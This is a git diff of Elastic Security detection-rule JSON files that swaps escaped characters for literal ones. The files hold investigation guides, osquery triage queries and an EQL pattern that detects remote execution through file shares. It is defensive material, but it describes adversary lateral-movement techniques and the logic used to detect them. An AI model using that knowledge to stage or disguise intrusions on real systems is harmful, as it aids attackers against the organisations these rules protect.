@@ -16,7 +16,7 @@ "language": "kuery", "license": "Elastic License v2", "name": "Threat Intel Hash Indicator Match", - "note": "## Triage and Analysis\n\n### Investigating Threat Intel Hash Indicator Match\n\nThreat Intel indicator match rules allow matching from a local observation, such as an endpoint event that records a file hash with an entry of a file hash stored within the Threat Intel integrations index. \n\nMatches are based on threat intelligence data that's been ingested during the last 30 days. Some integrations don't place expiration dates on their threat indicators, so we strongly recommend validating ingested threat indicators and reviewing match results. When reviewing match results, check associated activity to determine whether the event requires additional investigation.\n\nThis rule is triggered when a hash indicator from the Threat Intel Filebeat module or an indicator ingested from a threat intelligence integration matches against an event that contains file hashes, such as antivirus alerts, file operation events, etc.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Gain context about the field that matched the local observation. 
This information can be found in the `threat.indicator.matched.field` field.\n- Investigate the hash , which can be found in the `threat.indicator.matched.atomic` field:\n - Search for the existence and reputation of the hash in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n - Scope other potentially compromised hosts in your environment by mapping hosts with file operations involving the same hash.\n- Identify the process that created the file.\n - Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n - Enrich the information that you have right now by determining how the file was dropped, where it was downloaded from, etc. This can help you determine if the event is part of an ongoing campaign against the organization.\n- Retrieve the involved file and examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account 
FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n- Using the data collected through the analysis, scope users targeted and other machines infected in the environment.\n\n### False Positive Analysis\n\n- Adversaries often use legitimate tools as network administrators, such as `PsExec` or `AdFind`. These tools are often included in indicator lists, which creates the potential for false positives.\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", + "note": "## Triage and Analysis\n\n### Investigating Threat Intel Hash Indicator Match\n\nThreat Intel indicator match rules allow matching from a local observation, such as an endpoint event that records a file hash with an entry of a file hash stored within the Threat Intel integrations index. \n\nMatches are based on threat intelligence data that's been ingested during the last 30 days. Some integrations don't place expiration dates on their threat indicators, so we strongly recommend validating ingested threat indicators and reviewing match results. When reviewing match results, check associated activity to determine whether the event requires additional investigation.\n\nThis rule is triggered when a hash indicator from the Threat Intel Filebeat module or an indicator ingested from a threat intelligence integration matches against an event that contains file hashes, such as antivirus alerts, file operation events, etc.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Gain context about the field that matched the local observation. 
This information can be found in the `threat.indicator.matched.field` field.\n- Investigate the hash , which can be found in the `threat.indicator.matched.atomic` field:\n - Search for the existence and reputation of the hash in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n - Scope other potentially compromised hosts in your environment by mapping hosts with file operations involving the same hash.\n- Identify the process that created the file.\n - Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n - Enrich the information that you have right now by determining how the file was dropped, where it was downloaded from, etc. This can help you determine if the event is part of an ongoing campaign against the organization.\n- Retrieve the involved file and examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account 
FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n- Using the data collected through the analysis, scope users targeted and other machines infected in the environment.\n\n### False Positive Analysis\n\n- Adversaries often use legitimate tools as network administrators, such as `PsExec` or `AdFind`. These tools are often included in indicator lists, which creates the potential for false positives.\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", "query": "file.hash.*:* or process.hash.*:* or dll.hash.*:*\n", "references": [ "https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-threatintel.html", @@ -197,7 +197,7 @@ ] } ], - "threat_query": "@timestamp \u003e= \"now-30d/d\" and event.module:(threatintel or ti_*) and (threat.indicator.file.hash.*:* or threat.indicator.file.pe.imphash:*) and not labels.is_ioc_transform_source:\"true\"", + "threat_query": "@timestamp >= \"now-30d/d\" and event.module:(threatintel or ti_*) and (threat.indicator.file.hash.*:* or threat.indicator.file.pe.imphash:*) and not labels.is_ioc_transform_source:\"true\"", "timeline_id": "495ad7a7-316e-4544-8a0f-9c098daee76e", "timeline_title": "Generic Threat Match Timeline", "type": "threat_match", diff --git a/packages/security_detection_engine/kibana/security_rule/ab75c24b-2502-43a0-bf7c-e60e662c811e_104.json b/packages/security_detection_engine/kibana/security_rule/ab75c24b-2502-43a0-bf7c-e60e662c811e_104.json index f04bd59f815..55d5d503027 100644 --- a/packages/security_detection_engine/kibana/security_rule/ab75c24b-2502-43a0-bf7c-e60e662c811e_104.json +++ b/packages/security_detection_engine/kibana/security_rule/ab75c24b-2502-43a0-bf7c-e60e662c811e_104.json 
@@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Remote Execution via File Shares", - "note": "## Triage and analysis\n\n### Investigating Remote Execution via File Shares\n\nAdversaries can use network shares to host tooling to support the compromise of other hosts in the environment. These tools can include discovery utilities, credential dumpers, malware, etc.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Review adjacent login events (e.g., 4624) in the alert timeframe to identify the account used to perform this action.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve 
the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity can happen legitimately. Consider adding exceptions if it is expected and noisy in your environment.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Review the privileges needed to write to the network share and restrict write access as needed.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Remote Execution via File Shares\n\nAdversaries can use network shares to host tooling to support the compromise of other hosts in the environment. 
These tools can include discovery utilities, credential dumpers, malware, etc.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Review adjacent login events (e.g., 4624) in the alert timeframe to identify the account used to perform this action.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. 
Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity can happen legitimately. Consider adding exceptions if it is expected and noisy in your environment.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Review the privileges needed to write to the network share and restrict write access as needed.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "sequence with maxspan=1m\n [file where host.os.type == \"windows\" and event.type in (\"creation\", \"change\") and process.pid == 4 and file.extension : \"exe\"] by host.id, file.path\n [process where host.os.type == \"windows\" and event.type == \"start\"] by host.id, process.executable\n", "references": [ "https://blog.menasec.net/2020/08/new-trick-to-detect-lateral-movement.html" 
@@ -80,7 +80,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/ab75c24b-2502-43a0-bf7c-e60e662c811e_105.json b/packages/security_detection_engine/kibana/security_rule/ab75c24b-2502-43a0-bf7c-e60e662c811e_105.json index ebb7016ce02..3d1bf77e474 100644 --- a/packages/security_detection_engine/kibana/security_rule/ab75c24b-2502-43a0-bf7c-e60e662c811e_105.json +++ b/packages/security_detection_engine/kibana/security_rule/ab75c24b-2502-43a0-bf7c-e60e662c811e_105.json 
@@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Remote Execution via File Shares", - "note": "## Triage and analysis\n\n### Investigating Remote Execution via File Shares\n\nAdversaries can use network shares to host tooling to support the compromise of other hosts in the environment. These tools can include discovery utilities, credential dumpers, malware, etc.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Review adjacent login events (e.g., 4624) in the alert timeframe to identify the account used to perform this action.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for 
suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity can happen legitimately. 
Consider adding exceptions if it is expected and noisy in your environment.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Review the privileges needed to write to the network share and restrict write access as needed.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Remote Execution via File Shares\n\nAdversaries can use network shares to host tooling to support the compromise of other hosts in the environment. These tools can include discovery utilities, credential dumpers, malware, etc.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Review adjacent login events (e.g., 4624) in the alert timeframe to identify the account used to perform this action.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, 
pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity can happen legitimately. Consider adding exceptions if it is expected and noisy in your environment.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Review the privileges needed to write to the network share and restrict write access as needed.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "sequence with maxspan=1m\n [file where host.os.type == \"windows\" and event.type in (\"creation\", \"change\") and process.pid == 4 and file.extension : \"exe\"] by host.id, file.path\n [process where host.os.type == \"windows\" and event.type == \"start\"] by host.id, process.executable\n", "references": [ "https://blog.menasec.net/2020/08/new-trick-to-detect-lateral-movement.html" @@ -80,7 +80,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/ab75c24b-2502-43a0-bf7c-e60e662c811e_106.json b/packages/security_detection_engine/kibana/security_rule/ab75c24b-2502-43a0-bf7c-e60e662c811e_106.json index 6acf6e62b8e..316dce49ed8 100644 --- a/packages/security_detection_engine/kibana/security_rule/ab75c24b-2502-43a0-bf7c-e60e662c811e_106.json +++ b/packages/security_detection_engine/kibana/security_rule/ab75c24b-2502-43a0-bf7c-e60e662c811e_106.json 
@@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Remote Execution via File Shares", - "note": "## Triage and analysis\n\n### Investigating Remote Execution via File Shares\n\nAdversaries can use network shares to host tooling to support the compromise of other hosts in the environment. These tools can include discovery utilities, credential dumpers, malware, etc.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Review adjacent login events (e.g., 4624) in the alert timeframe to identify the account used to perform this action.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for 
suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity can happen legitimately. 
Consider adding exceptions if it is expected and noisy in your environment.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Review the privileges needed to write to the network share and restrict write access as needed.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Remote Execution via File Shares\n\nAdversaries can use network shares to host tooling to support the compromise of other hosts in the environment. These tools can include discovery utilities, credential dumpers, malware, etc.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Review adjacent login events (e.g., 4624) in the alert timeframe to identify the account used to perform this action.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, 
pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity can happen legitimately. Consider adding exceptions if it is expected and noisy in your environment.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Review the privileges needed to write to the network share and restrict write access as needed.\n- Run a full antimalware scan. 
